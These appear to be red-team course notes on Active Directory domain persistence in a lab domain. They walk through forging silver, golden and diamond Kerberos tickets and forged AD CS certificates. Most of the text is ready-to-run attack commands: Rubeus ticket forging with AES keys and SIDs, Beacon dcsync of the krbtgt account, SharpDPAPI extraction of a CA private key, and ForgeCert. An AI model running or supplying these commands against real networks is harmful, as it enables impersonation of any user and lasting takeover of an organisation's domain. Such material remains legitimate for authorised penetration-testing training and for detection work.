Domain Dominance
Silver Ticket
A “silver ticket” is a forged TGS, signed using the secret material (RC4/AES keys) of a computer account. You may forge a TGS for any user to any service on that machine, which is useful for short/medium-term persistence. By default, computer passwords change every 30 days, at which time you must re-obtain the new secrets to continue making silver tickets. Both silver and golden (coming up next) tickets are forged, so can be generated on your own machine and imported into your Beacon session for use.
Imagine we have dumped kerberos keys for WKSTN-1$, we could then:
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /service:cifs/wkstn-1.dev.cyberbotic.io /aes256:c9e598cd2a9b08fe31936f2c1846a8365d85147f75b8000cbc90e3c9de50fcc7 /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrapImport the ticket:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFXD[...]MuaW8=Good combinations:
| Technique | Required Service Tickets |
|---|---|
| psexec | CIFS |
| winrm | HOST & HTTP |
| dcsync | LDAP |
Golden Ticket
A “golden ticket” is a forged TGT, signed by the domain’s krbtgt account. Where a silver ticket can be used to impersonate any user, it’s limited to either that single service or to any service but on a single machine. A golden ticket can be used to impersonate any user, to any service, on any machine in the domain; and to add insult to injury - the underlying credentials are never changed automatically. For that reason, the krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).
# get the krbtgt keys
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
# create a golden ticket
PS C:\Users\Attacker> C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrapDiamond Ticket
Like a golden ticket, a diamond ticket is a TGT which can be used to access any service as any user. A golden ticket is forged completely offline, encrypted with the krbtgt hash of that domain, and then passed into a logon session for use. Because domain controllers don’t track TGTs it (or they) have legitimately issued, they will happily accept TGTs that are encrypted with its own krbtgt hash.
Therefore, a possible tactic to detect the use of golden tickets is to look for TGS-REQs that have no corresponding AS-REQ. A “diamond ticket” is made by modifying the fields of a legitimate TGT that was issued by a DC. This is achieved by requesting a TGT, decrypting it with the domain’s krbtgt hash, modifying the desired fields of the ticket, then re-encrypting it. This overcomes the aforementioned shortcoming of a golden ticket because any TGS-REQs will have a preceding AS-REQ.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:nlamb /ticketuserid:1106 /groups:512 /krbkey:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /nowrapForged AD CS Certificates
extract private key of CA:
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe certificates /machinesave certificate to a pem file and convert to pfx with openssl.
Build a forged certificate with ForgeCert:
PS C:\Users\Attacker> C:\Tools\ForgeCert\ForgeCert\bin\Release\ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "nlamb@cyberbotic.io" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123Get TGT for user/machine with the certificate:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap- you can do this with any user or machine
- combine that with S4U2self to gain access to any machine in the domain